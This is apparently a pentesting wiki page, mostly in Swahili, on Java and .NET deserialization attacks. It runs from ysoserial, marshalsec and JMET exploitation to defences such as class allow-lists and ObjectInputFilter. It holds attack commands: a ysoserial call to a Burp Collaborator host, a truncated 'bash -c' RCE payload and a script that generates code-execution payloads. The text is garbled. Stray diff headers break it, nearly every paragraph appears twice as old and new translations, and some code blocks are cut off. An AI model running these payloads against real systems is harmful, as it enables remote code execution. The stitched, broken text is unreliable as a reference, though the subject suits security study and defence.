Ikiwa unataka **learn about how does a Java Deserialized exploit work** unapaswa kuangalia [**Basic Java Deserialization**](basic-java-deserialization-objectinputstream-readobject.md), [**Java DNS Deserialization**](java-dns-deserialization-and-gadgetprobe.md), na [**CommonsCollection1 Payload**](java-transformers-to-rutime-exec-payload.md).
#### Mtihani wa Sanduku Nyeupe
#### SignedObject-gated deserialization and pre-auth reachability
Unaweza kuangalia kama kuna programu yoyote iliyosakinishwa yenye udhaifu unaojulikana.
Maktaba za kisasa za msimbo wakati mwingine huzungusha deserialization na `java.security.SignedObject` na validate a signature kabla ya kuita `getObject()` (ambayo deserializes the inner object). Hii inazuia arbitrary top-level gadget classes lakini inaweza bado kuwa exploitable ikiwa attacker anaweza kupata valid signature (e.g., private-key compromise or a signing oracle). Zaidi ya hayo, error-handling flows zinaweza mint session-bound tokens kwa unauthenticated users, zikifunua protected sinks ambazo vinginevyo zingewekwa salama pre-auth.
Kwa utafiti wa kesi maalum na requests, IoCs, na hardening guidance, angalia:
{{#ref}}
java-signedobject-gated-deserialization.md
{{#endref}}
#### White Box Test
Unaweza kukagua ikiwa kuna programu yoyote iliyosakinishwa yenye udhaifu unaojulikana.
```bash
find . -iname "*commons*collection*"
grep -R InvokeTransformer .
```
You could try to **check all the libraries** known to be vulnerable and that [**Ysoserial** ](https://github.com/frohoff/ysoserial)can provide an exploit for. Or you could check the libraries indicated on [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json).\
You could also use [**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector) to search for possible gadget chains that can be exploited.\
When running **gadgetinspector** (after building it) don't care about the tons of warnings/errors that it's going through and let it finish. It will write all the findings under _gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_. Please, notice that **gadgetinspector won't create an exploit and it may indicate false positives**.
Unaweza kujaribu ku **check all the libraries** zinazojulikana kuwa zilizo na udhaifu na ambazo [**Ysoserial** ](https://github.com/frohoff/ysoserial) inaweza kutoa exploit kwa ajili yao. Au unaweza kuangalia maktaba zilizotajwa kwenye [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json).\
Unaweza pia kutumia [**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector) kutafuta possible gadget chains zinazoweza kutumika.\
Unapotekeleza **gadgetinspector** (baada ya kuibuni) usijali kuhusu maelfu ya onyo/mahitilafu ambazo inazopitia na uiruhusu ikamilike. Itaandika matokeo yote chini ya _gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_. Tafadhali, kumbuka kuwa **gadgetinspector won't create an exploit and it may indicate false positives**.
#### Black Box Test
#### Mtihani wa Black Box
Using the Burp extension [**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md) you can identify **which libraries are available** (and even the versions). With this information it could be **easier to choose a payload** to exploit the vulnerability.\
Ukivitumia extension ya Burp [**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md) unaweza kubaini **ni maktaba gani zinapatikana** (na hata versions). Kwa taarifa hii inaweza kuwa **rahisi zaidi kuchagua payload** ya ku-exploit udhaifu.\
[**Read this to learn more about GadgetProbe**](java-dns-deserialization-and-gadgetprobe.md#gadgetprobe)**.**\
GadgetProbe is focused on **`ObjectInputStream` deserializations**.
GadgetProbe ni focused kwenye **`ObjectInputStream` deserializations**.
Using Burp extension [**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) you can **identify vulnerable libraries** exploitable with ysoserial and **exploit** them.\
Ukivitumia extension ya Burp [**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) unaweza **identify vulnerable libraries** zinazoweza ku-exploit kwa ysoserial na **exploit** hizo.\
[**Read this to learn more about Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner)\
Java Deserialization Scanner is focused on **`ObjectInputStream`** deserializations.
Java Deserialization Scanner inafocus kwenye **`ObjectInputStream`** deserializations.
You can also use [**Freddy**](https://github.com/nccgroup/freddy) to **detect deserializations** vulnerabilities in **Burp**. This plugin will detect **not only `ObjectInputStream`** related vulnerabilities but **also** vulns from **Json** an **Yml** deserialization libraries. In active mode, it will try to confirm them using sleep or DNS payloads.\
Unaweza pia kutumia [**Freddy**](https://github.com/nccgroup/freddy) kugundua **deserializations** vulnerabilities ndani ya **Burp**. Plugin hii itagundua **not only `ObjectInputStream`** related vulnerabilities bali pia vulns kutoka kwa maktaba za deserialization za **Json** na **Yml**. Katika active mode, itajaribu kuzi-confirm kwa kutumia sleep au DNS payloads.\
[**You can find more information about Freddy here.**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/)
**Serialization Test**
Not all is about checking if any vulnerable library is used by the server. Sometimes you could be able to **change the data inside the serialized object and bypass some checks** (maybe grant you admin privileges inside a webapp).\
If you find a java serialized object being sent to a web application, **you can use** [**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper) **to print in a more human readable format the serialization object that is sent**. Knowing which data are you sending would be easier to modify it and bypass some checks.
Sio kila kitu ni kuhusu kuangalia kama server inatumia maktaba zilizo na udhaifu. Wakati mwingine unaweza kuwa na uwezo wa **change the data inside the serialized object and bypass some checks** (huenda ikakupa admin privileges ndani ya webapp).\
Ikiwa utapata java serialized object ikitumwa kwa web application, **unaweza use** [**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper) **to print in a more human readable format the serialization object that is sent**. Kujua ni data gani unazituma kutafanya iwe rahisi kuibadilisha na kupitisha baadhi ya checks.
### **Exploit**
#### **ysoserial**
The main tool to exploit Java deserializations is [**ysoserial**](https://github.com/frohoff/ysoserial) ([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)). You can also consider using [**ysoseral-modified**](https://github.com/pimps/ysoserial-modified) which will allow you to use complex commands (with pipes for example).\
Note that this tool is **focused** on exploiting **`ObjectInputStream`**.\
I would **start using the "URLDNS"** payload **before a RCE** payload to test if the injection is possible. Anyway, note that maybe the "URLDNS" payload is not working but other RCE payload is.
Chombo kikuu cha ku-exploit Java deserializations ni [**ysoserial**](https://github.com/frohoff/ysoserial) ([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)). Unaweza pia kuzingatia kutumia [**ysoseral-modified**](https://github.com/pimps/ysoserial-modified) ambacho kitakuwezesha kutumia complex commands (kwa pipes kwa mfano).\
Kumbuka chombo hiki ni **focused** kwenye ku-exploit **`ObjectInputStream`**.\
Ningependekeza **kuanza kutumia "URLDNS"** payload **kabla ya RCE** payload ili kujaribu kama injection inawezekana. Hata hivyo, kumbuka kuwa inaweza kuwa payload ya "URLDNS" haifanyi kazi lakini payload nyingine ya RCE inaweza kufanya kazi.
```bash
# PoC to make the application perform a DNS req
java -jar ysoserial-master-SNAPSHOT.jar URLDNS http://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net > payload
@ -484,9 +498,9 @@ java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,ZXhwb
# Base64 encode payload in base64
base64 -w0 payload
```
Wakati wa kuunda payload kwa **java.lang.Runtime.exec()** huwezi kutumia herufi maalum kama ">" au "|" kuhamasisha matokeo ya utekelezaji, "$()" kutekeleza amri au hata **kupitisha hoja** kwa amri zilizotenganishwa na **nafasi** (unaweza kufanya `echo -n "hello world"` lakini huwezi kufanya `python2 -c 'print "Hello world"'`). Ili kuandika payload kwa usahihi unaweza [kutumia ukurasa huu](http://www.jackson-t.ca/runtime-exec-payloads.html).
Unapotengeneza payload kwa **java.lang.Runtime.exec()** huwezi kutumia herufi maalum kama ">" au "|" kupeleka matokeo ya utekelezaji, "$()" kutekeleza amri au hata **kupitisha arguments** kwa amri zilizo tofauti kwa **spaces** (unaweza kufanya `echo -n "hello world"` lakini huwezi kufanya `python2 -c 'print "Hello world"'`). Ili ku-encode payload kwa usahihi unaweza [use this webpage](http://www.jackson-t.ca/runtime-exec-payloads.html).
Jihisi huru kutumia skripti ifuatayo kuunda **payloads zote zinazowezekana za utekelezaji wa msimbo** kwa Windows na Linux kisha uzijaribu kwenye ukurasa wa wavuti ulio hatarini:
Usisite kutumia script ifuatayo kuunda **all the possible code execution** payloads kwa Windows na Linux kisha kuzijaribu kwenye ukurasa wa wavuti ulio dhaifu:
```python
import os
import base64
@ -509,12 +523,12 @@ generate('Linux', 'ping -c 1 nix.REPLACE.server.local')
```
#### serialkillerbypassgadgets
Unaweza **kutumia** [**https://github.com/pwntester/SerialKillerBypassGadgetCollection**](https://github.com/pwntester/SerialKillerBypassGadgetCollection) **pamoja na ysoserial kuunda exploit zaidi**. Taarifa zaidi kuhusu chombo hiki katika **slides za mazungumzo** ambapo chombo kilitolewa: [https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1)
Unaweza **kutumia** [**https://github.com/pwntester/SerialKillerBypassGadgetCollection**](https://github.com/pwntester/SerialKillerBypassGadgetCollection) **pamoja na ysoserial kuunda exploits zaidi**. Taarifa zaidi kuhusu zana hii ziko kwenye **slides za mawasilisho** ambapo zana ilitambulishwa: [https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1)
#### marshalsec
[**marshalsec** ](https://github.com/mbechler/marshalsec)inaweza kutumika kuunda payloads za kutumia katika maktaba tofauti za **Json** na **Yml** serialization katika Java.\
Ili kukusanya mradi nilihitaji **kuongeza** hizi **dependencies** kwenye `pom.xml`:
[**marshalsec** ](https://github.com/mbechler/marshalsec) inaweza kutumika kutengeneza payloads za ku-exploit maktaba tofauti za serialization za **Json** na **Yml** katika Java.\
Ili ku-compile project nilihitaji **kuongeza** hizi **dependencies** kwenye `pom.xml`:
```html
<dependency>
<groupId>javax.activation</groupId>
@ -538,35 +552,35 @@ mvn clean package -DskipTests
Soma zaidi kuhusu maktaba hii ya Java JSON: [https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html](https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html)
### Labs
### Maabara
- Ikiwa unataka kujaribu baadhi ya payloads za ysoserial unaweza **kuendesha hii webapp**: [https://github.com/hvqzao/java-deserialize-webapp](https://github.com/hvqzao/java-deserialize-webapp)
- Ikiwa unataka kujaribu baadhi ya ysoserial payloads unaweza **kuendesha webapp hii**: [https://github.com/hvqzao/java-deserialize-webapp](https://github.com/hvqzao/java-deserialize-webapp)
- [https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
### Kwa Nini
### Kwa nini
Java inatumia serialization nyingi kwa madhumuni mbalimbali kama:
Java inatumia serialization kwa wingi kwa madhumuni mbalimbali kama:
- **HTTP requests**: Serialization inatumika sana katika usimamizi wa vigezo, ViewState, cookies, nk.
- **RMI (Remote Method Invocation)**: Protokali ya Java RMI, ambayo inategemea kabisa serialization, ni msingi wa mawasiliano ya mbali katika programu za Java.
- **RMI juu ya HTTP**: Njia hii inatumika kawaida na programu za wavuti za Java zenye wateja wazito, zikitumika serialization kwa mawasiliano yote ya vitu.
- **JMX (Java Management Extensions)**: JMX inatumia serialization kwa kutuma vitu kupitia mtandao.
- **Protokali za Kawaida**: Katika Java, mazoea ya kawaida yanahusisha uhamasishaji wa vitu vya Java safi, ambavyo vitadhihirishwa katika mifano ijayo ya exploit.
- **HTTP requests**: Serialization inatumiwa sana katika usimamizi wa vigezo, ViewState, cookies, n.k.
- **RMI (Remote Method Invocation)**: Itifaki ya Java RMI, inayotegemea kabisa serialization, ni nguzo muhimu kwa mawasiliano ya mbali katika programu za Java.
- **RMI over HTTP**: Njia hii kawaida hutumika na web applications za client nene zinazotegemea Java, ikitumia serialization kwa mawasiliano yote ya object.
- **JMX (Java Management Extensions)**: JMX inatumia serialization kutuma objects kupitia mtandao.
- **Custom Protocols**: Katika Java, mazoea ya kawaida ni pamoja na uhamishaji wa raw Java objects, jambo litakaloonyeshwa katika mifano ya exploits zijazo.
### Kuzuia
#### Vitu vya muda
#### Transient objects
Darasa linalotekeleza `Serializable` linaweza kutekeleza kama `transient` kitu chochote ndani ya darasa ambacho hakipaswi kuwa serializable. Kwa mfano:
Darasa linaloimplements `Serializable` linaweza kuweka kama `transient` kitu chochote ndani ya darasa ambacho hakipaswi kuwa serializable. Kwa mfano:
```java
public class myAccount implements Serializable
{
private transient double profit; // declared transient
private transient double margin; // declared transient
```
#### Epuka Serialization ya darasa ambalo linahitaji kutekeleza Serializable
#### Epuka kusanifisha darasa linalohitaji kutekeleza Serializable
Katika hali ambapo **vitu fulani vinapaswa kutekeleza interface ya `Serializable`** kutokana na mfuatano wa darasa, kuna hatari ya deserialization isiyo ya makusudi. Ili kuzuia hili, hakikisha vitu hivi havina uwezo wa deserializable kwa kufafanua njia ya `final` `readObject()` ambayo daima inatupa kivunjaji, kama inavyoonyeshwa hapa chini:
Katika matukio ambapo baadhi ya **vitu lazima vitekeleze kiolesura cha `Serializable`** kutokana na hierarki ya madarasa, kuna hatari ya deserialization isiyokusudiwa. Ili kuzuia hili, hakikisha vitu hivi haviwezi kudeserializa kwa kufafanua method ya `final` `readObject()` ambayo kila mara inatoa exception, kama inavyoonyeshwa hapa chini:
```java
private final void readObject(ObjectInputStream in) throws java.io.IOException {
throw new java.io.IOException("Cannot be deserialized");
@ -574,12 +588,12 @@ throw new java.io.IOException("Cannot be deserialized");
```
#### **Kuimarisha Usalama wa Deserialization katika Java**
**Kubadilisha `java.io.ObjectInputStream`** ni njia ya vitendo ya kulinda michakato ya deserialization. Njia hii inafaa wakati:
**Customizing `java.io.ObjectInputStream`** ni njia ya vitendo ya kuimarisha michakato ya deserialization. Njia hii inafaa pale:
- Kanuni za deserialization ziko chini ya udhibiti wako.
- Msimbo wa deserialization uko chini ya udhibiti wako.
- Madarasa yanayotarajiwa kwa deserialization yanajulikana.
Pitia **`resolveClass()`** ili kupunguza deserialization kwa madarasa yaliyoruhusiwa tu. Hii inazuia deserialization ya darasa lolote isipokuwa yale yaliyoruhusiwa wazi, kama katika mfano ufuatao unaopunguza deserialization kwa darasa la `Bicycle` pekee:
Fanya override ya **`resolveClass()`** method ili kupunguza deserialization kwa madarasa yaliyoruhusiwa tu. Hii inazuia deserialization ya darasa lolote isipokuwa yale yaliyoruhusiwa wazi, kama katika mfano ufuatao unaozuia deserialization kwa darasa la `Bicycle` tu:
```java
// Code from https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
public class LookAheadObjectInputStream extends ObjectInputStream {
@ -600,17 +614,17 @@ return super.resolveClass(desc);
}
}
```
**Kutumia Wakala wa Java kwa Kuimarisha Usalama** hutoa suluhisho la akiba wakati mabadiliko ya msimbo hayawezekani. Njia hii inatumika hasa kwa **kuorodhesha madarasa hatari**, kwa kutumia parameter ya JVM:
**Kutumia Java Agent kwa Uboreshaji wa Usalama** hutoa suluhisho la dharura wakati mabadiliko ya code hayapowezekani. Njia hii inatumika hasa kwa **blacklisting harmful classes**, kwa kutumia parameter ya JVM:
```
-javaagent:name-of-agent.jar
```
Inatoa njia ya kulinda deserialization kwa njia ya kidinamik, inayofaa kwa mazingira ambapo mabadiliko ya haraka ya msimbo hayawezekani.
Inatoa njia ya kuimarisha deserialization kwa njia ya dinamiki, inayofaa kwa mazingira ambapo mabadiliko ya haraka ya code hayawezekani.
Angalia mfano katika [rO0 by Contrast Security](https://github.com/Contrast-Security-OSS/contrast-rO0)
**Kutekeleza Filters za Serialization**: Java 9 ilianzisha filters za serialization kupitia **`ObjectInputFilter`** interface, ikitoa mekanismu yenye nguvu ya kuweka vigezo ambavyo vitu vilivyotolewa lazima viwe navyo kabla ya deserialization. Filters hizi zinaweza kutumika kwa kiwango cha jumla au kwa kila mtiririko, zikitoa udhibiti wa kina juu ya mchakato wa deserialization.
**Kutekeleza Serialization Filters**: Java 9 ilianzisha serialization filters kupitia kiolesura cha **`ObjectInputFilter`**, ikitoa mekanismo chenye nguvu cha kutaja vigezo vinavyopaswa kutimizwa na serialized objects kabla ya kutolewa (deserialized). Filters hizi zinaweza kutumika globally au kwa kila stream, zikitoa udhibiti wa kina juu ya mchakato wa deserialization.
Ili kutumia filters za serialization, unaweza kuweka filter ya jumla inayotumika kwa shughuli zote za deserialization au kuikamilisha kwa njia ya kidinamik kwa mitiririko maalum. Kwa mfano:
Ili kutumia serialization filters, unaweza kuweka global filter inayotumika kwa shughuli zote za deserialization au kuisanidi kwa njia ya dinamiki kwa streams maalum. Kwa mfano:
```java
ObjectInputFilter filter = info -> {
if (info.depth() > MAX_DEPTH) return Status.REJECTED; // Limit object graph depth
@ -622,29 +636,30 @@ return Status.ALLOWED;
};
ObjectInputFilter.Config.setSerialFilter(filter);
```
**Kutumia Maktaba za Nje kwa Usalama Bora**: Maktaba kama **NotSoSerial**, **jdeserialize**, na **Kryo** hutoa vipengele vya juu vya kudhibiti na kufuatilia deserialization ya Java. Maktaba hizi zinaweza kutoa tabaka za ziada za usalama, kama vile kuorodhesha au kuzuia madarasa, kuchambua vitu vilivyohifadhiwa kabla ya deserialization, na kutekeleza mikakati ya kawaida ya serialization.
**Kutumia Maktaba za Nje kwa Usalama Ulioimarishwa**: Libraries such as **NotSoSerial**, **jdeserialize**, and **Kryo** offer advanced features for controlling and monitoring Java deserialization. These libraries can provide additional layers of security, such as whitelisting or blacklisting classes, analyzing serialized objects before deserialization, and implementing custom serialization strategies.
- **NotSoSerial** inakamata michakato ya deserialization ili kuzuia utekelezaji wa msimbo usioaminika.
- **jdeserialize** inaruhusu uchambuzi wa vitu vilivyohifadhiwa vya Java bila kuvisafirisha, kusaidia kubaini maudhui yanayoweza kuwa na madhara.
- **Kryo** ni mfumo mbadala wa serialization unaosisitiza kasi na ufanisi, ukitoa mikakati ya serialization inayoweza kubadilishwa ambayo inaweza kuongeza usalama.
- **NotSoSerial** huingilia mchakato wa deserialization ili kuzuia utekelezaji wa code isiyoaminika.
- **jdeserialize** huwezesha uchambuzi wa serialized Java objects bila kuzi-deserialize, ikisaidia kubaini maudhui ya kibenajezaki.
- **Kryo** ni framework mbadala ya serialization inayosisitiza kasi na ufanisi, ikitoa mikakati ya serialization inayoweza kusanidiwa ambayo inaweza kuboresha usalama.
### Marejeleo
- [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html)
- Mazungumzo ya Deserialization na ysoserial: [http://frohoff.github.io/appseccali-marshalling-pickles/](http://frohoff.github.io/appseccali-marshalling-pickles/)
- Deserialization and ysoserial talk: [http://frohoff.github.io/appseccali-marshalling-pickles/](http://frohoff.github.io/appseccali-marshalling-pickles/)
- [https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/](https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)
- [https://www.youtube.com/watch?v=VviY3O-euVQ](https://www.youtube.com/watch?v=VviY3O-euVQ)
- Mazungumzo kuhusu gadgetinspector: [https://www.youtube.com/watch?v=wPbW6zQ52w8](https://www.youtube.com/watch?v=wPbW6zQ52w8) na slides: [https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf](https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf)
- Karatasi ya Marshalsec: [https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true](https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true)
- Talk about gadgetinspector: [https://www.youtube.com/watch?v=wPbW6zQ52w8](https://www.youtube.com/watch?v=wPbW6zQ52w8) and slides: [https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf](https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf)
- Marshalsec paper: [https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true](https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true)
- [https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr](https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr)
- [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
- [https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html](https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html)
- Karatasi ya deserialization ya Java na .Net JSON **: [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** mazungumzo: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) na slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
- CVEs za deserialization: [https://paper.seebug.org/123/](https://paper.seebug.org/123/)
- Java and .Net JSON deserialization **paper:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** talk: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) and slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
- Deserialziations CVEs: [https://paper.seebug.org/123/](https://paper.seebug.org/123/)
## JNDI Injection & log4Shell
Pata kile ambacho ni **JNDI Injection, jinsi ya kulitumia kupitia RMI, CORBA & LDAP na jinsi ya kutumia log4shell** (na mfano wa vuln hii) katika ukurasa ufuatao:
Gundua ni nini **JNDI Injection, jinsi ya kuitumia vibaya kupitia RMI, CORBA & LDAP na jinsi ya kuchukua faida ya log4shell** (na mfano wa udhaifu huu) kwenye ukurasa ufuatao:
{{#ref}}
jndi-java-naming-and-directory-interface-and-log4shell.md
@ -652,11 +667,11 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
## JMS - Java Message Service
> API ya **Java Message Service** (**JMS**) ni API ya Java inayolenga ujumbe kwa ajili ya kutuma ujumbe kati ya wateja wawili au zaidi. Ni utekelezaji wa kushughulikia tatizo la mtengenezaji-mtumiaji. JMS ni sehemu ya Jukwaa la Java, Toleo la Biashara (Java EE), na ilifafanuliwa na spesifikesheni iliyotengenezwa katika Sun Microsystems, lakini ambayo tangu wakati huo imeongozwa na Mchakato wa Jamii ya Java. Ni kiwango cha ujumbe kinachoruhusu vipengele vya programu vinavyotegemea Java EE kuunda, kutuma, kupokea, na kusoma ujumbe. Inaruhusu mawasiliano kati ya vipengele tofauti vya programu iliyosambazwa kuwa na uhusiano wa kulegea, wa kuaminika, na wa asynchronic. (Kutoka [Wikipedia](https://en.wikipedia.org/wiki/Java_Message_Service)).
> API ya **Java Message Service** (**JMS**) ni API ya middleware inayolenga ujumbe kwa Java kwa kutuma messages kati ya clients wawili au zaidi. Ni utekelezaji wa kushughulikia tatizo la producerconsumer. JMS ni sehemu ya Java Platform, Enterprise Edition (Java EE), na ilibainishwa na specification iliyotengenezwa na Sun Microsystems, lakini tangu wakati huo imeelekezwa na Java Community Process. Ni standard ya messaging inayoruhusu vipengele vya programu vinavyotegemea Java EE kuunda, kutuma, kupokea, na kusoma messages. Inaruhusu mawasiliano kati ya vipengele tofauti vya application iliyogawanyika kuwa loosely coupled, reliable, na asynchronous. (From [Wikipedia](https://en.wikipedia.org/wiki/Java_Message_Service)).
### Bidhaa
### Products
Kuna bidhaa kadhaa zinazotumia middleware hii kutuma ujumbe:
There are several products using this middleware to send messages:
![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../images/image (314).png>)
@ -664,59 +679,58 @@ Kuna bidhaa kadhaa zinazotumia middleware hii kutuma ujumbe:
### Utekelezaji
Hivyo, kimsingi kuna **huduma nyingi zinazotumia JMS kwa njia hatari**. Kwa hivyo, ikiwa una **mamlaka ya kutosha** kutuma ujumbe kwa huduma hizi (kawaida utahitaji akidi halali) unaweza kuwa na uwezo wa kutuma **vitu vya hatari vilivyohifadhiwa ambavyo vitasafirishwa na mtumiaji/mwandikaji**.\
Hii inamaanisha kwamba katika utekelezaji huu **wateja wote watakaotumia ujumbe huo wataambukizwa**.
Kwa hivyo, msingi ni kwamba kuna huduma nyingi zinazotumia JMS kwa njia hatarishi. Kwa hiyo, kama una privileges za kutosha za kutuma messages kwa huduma hizi (kawaida utahitaji valid credentials) unaweza kuwa na uwezo wa kutuma malicious objects serialized ambazo zitatafsiriwa (deserialized) na consumer/subscriber. Hii ina maana kwamba katika shambulio hili, all the clients watakaotumia message hiyo wataambukizwa.
Unapaswa kukumbuka kwamba hata kama huduma ina udhaifu (kwa sababu inasafirisha kwa usalama usiofaa maoni ya mtumiaji) bado unahitaji kutafuta gadgets halali ili kutumia udhaifu huo.
Kumbuka kwamba hata kama service ni vulnerable (kwa sababu inafanya insecurely deserializing user input) bado unatakiwa kupata valid gadgets ili ku-exploit udhaifu huo.
Zana [JMET](https://github.com/matthiaskaiser/jmet) ilitengenezwa ili **kuunganisha na kushambulia huduma hizi kwa kutuma vitu kadhaa vya hatari vilivyohifadhiwa kwa kutumia gadgets zinazojulikana**. Hizi exploit zitafanya kazi ikiwa huduma bado ina udhaifu na ikiwa mojawapo ya gadgets zilizotumika iko ndani ya programu iliyo hatarini.
Tool ya [JMET](https://github.com/matthiaskaiser/jmet) ilitengenezwa ili **kuunganisha na kushambulia huduma hizi kwa kutuma malicious objects serialized kwa kutumia gadgets zilizojulikana**. Hizi exploits zitatenda kazi ikiwa service bado ni vulnerable na ikiwa mmoja wa gadgets zilizotumika upo ndani ya application iliyo vulnerable.
### Marejeleo
- [Patchstack advisory Everest Forms unauthenticated PHP Object Injection (CVE-2025-52709)](https://patchstack.com/articles/critical-vulnerability-impacting-over-100k-sites-patched-in-everest-forms-plugin/)
- Mazungumzo ya JMET: [https://www.youtube.com/watch?v=0h8DWiOWGGA](https://www.youtube.com/watch?v=0h8DWiOWGGA)
- JMET talk: [https://www.youtube.com/watch?v=0h8DWiOWGGA](https://www.youtube.com/watch?v=0h8DWiOWGGA)
- Slides: [https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf)
## .Net
Katika muktadha wa .Net, exploit za deserialization zinafanya kazi kwa njia inayofanana na zile zinazopatikana katika Java, ambapo gadgets zinatumika kuendesha msimbo maalum wakati wa deserialization ya kitu.
Katika muktadha wa .Net, deserialization exploits hufanya kazi kwa njia inayofanana na ile inayopatikana katika Java, ambapo gadgets zinatumika kuendesha code maalumu wakati wa deserialization ya object.
### Alama
### Fingerprint
#### WhiteBox
Msimbo wa chanzo unapaswa kuchunguzwa kwa matukio ya:
Kanuni chanzo inapaswa kuchunguzwa kwa kutafuta matukio ya:
1. `TypeNameHandling`
2. `JavaScriptTypeResolver`
Kipaumbele kinapaswa kuwa kwa serializers zinazoruhusu aina kuamuliwa na variable chini ya udhibiti wa mtumiaji.
Msingi wa uchunguzi unapaswa kuwa kwenye serializers ambazo zinamruhusu type kubainishwa na variable chini ya udhibiti wa user.
#### BlackBox
Utafutaji unapaswa kulenga mfuatano wa string iliyokodishwa kwa Base64 **AAEAAAD/////** au muundo wowote wa kufanana ambao unaweza kupitia deserialization upande wa seva, ukitoa udhibiti juu ya aina itakayohifadhiwa. Hii inaweza kujumuisha, lakini si mdogo kwa, muundo wa **JSON** au **XML** unaoonyesha `TypeObject` au `$type`.
Utafutaji unapaswa kulenga Base64 encoded string **AAEAAAD/////** au muundo wowote unaofanana ambao unaweza kufanyiwa deserialization kwenye upande wa server, ukikupa udhibiti juu ya type itakayodeserializiwa. Hii inaweza kujumuisha, lakini sio tu, muundo za **JSON** au **XML** zenye `TypeObject` au `$type`.
### ysoserial.net
Katika kesi hii unaweza kutumia zana [**ysoserial.net**](https://github.com/pwntester/ysoserial.net) ili **kuunda exploit za deserialization**. Mara tu unaposhusha hifadhi ya git unapaswa **kuunda zana hiyo** kwa kutumia Visual Studio kwa mfano.
Katika kesi hii unaweza kutumia tool ya [**ysoserial.net**](https://github.com/pwntester/ysoserial.net) ili **kuunda deserialization exploits**. Ukishopakua git repository inabidi **ucompile tool** ukitumia Visual Studio kwa mfano.
